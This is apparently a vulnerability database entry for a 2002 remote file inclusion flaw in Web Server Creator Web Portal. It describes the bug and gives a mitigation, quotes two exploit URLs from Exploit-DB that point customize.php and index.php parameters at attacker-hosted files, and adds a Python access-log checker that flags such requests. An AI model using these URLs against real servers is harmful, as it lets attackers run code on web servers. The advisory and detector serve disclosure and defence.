Vendor: Web Portal
By: SecurityFocus
CVSS: 8.8 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: Web Portal
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: o:web_server_creator:web_portal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2002

Web Server Creator Web Portal Remote File Inclusion Vulnerability

Web Server Creator Web Portal is vulnerable to a Remote File Inclusion vulnerability, which allows attackers to include arbitrary files from a remote server. This is possible because remote attackers can influence the include path for the customize.php and index.php scripts. An attacker can cause an arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with the privileges of the webserver.

Mitigation:

Upgrade to the latest version of Web Server Creator Web Portal.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6251/info

The Web Server Creator Web Portal is prone to an issue which may allow attackers to include arbitrary files from a remote server.

It is possible for remote attackers to influence the include path for the customize.php and index.php scripts. As a result, an attacker may cause an arbitrary PHP script to be included from an attacker-supplied source, which may result in execution of commands with the privileges of the webserver.

http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
http://[target]/index.php?pg=http://[attacker]/badfile
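
A log check for the two request patterns listed above, as an added example that is not part of the original advisory or of the product's code. It flags requests where the `l` parameter of customize.php or the `pg` parameter of index.php carries a URL-like value; the log format, the helper names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script path -> query parameter, both taken from the advisory's example URLs.
WATCHED = {"/news/include/customize.php": "l", "/index.php": "pg"}

# Value starting with a scheme-like prefix (http:, ftp:, php:, ...) or "//host".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.IGNORECASE)

# Request field of a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?pg=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?pg=http://203.0.113.5/badfile HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news/include/customize.php?l=hTTp%3A%2F%2F203.0.113.5%2Ffile.txt HTTP/1.1" 200 90',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /news/include/customize.php?l=en HTTP/1.1" 200 300',
]


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def rfi_hits(log_lines):
    """Return (line_number, path, param, value) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        path = target.path.lower()
        for suffix, param in WATCHED.items():
            if not path.endswith(suffix):
                continue
            for name, value in parse_qsl(target.query, keep_blank_values=True):
                value = decode(value)  # parse_qsl has already decoded once
                if name == param and REMOTE_VALUE.match(value):
                    hits.append((number, target.path, name, value))
    return hits
```

Only query-string values appear in access logs, so parameters sent in a POST body are not covered. A hit records an attempt and says nothing about whether the include succeeded.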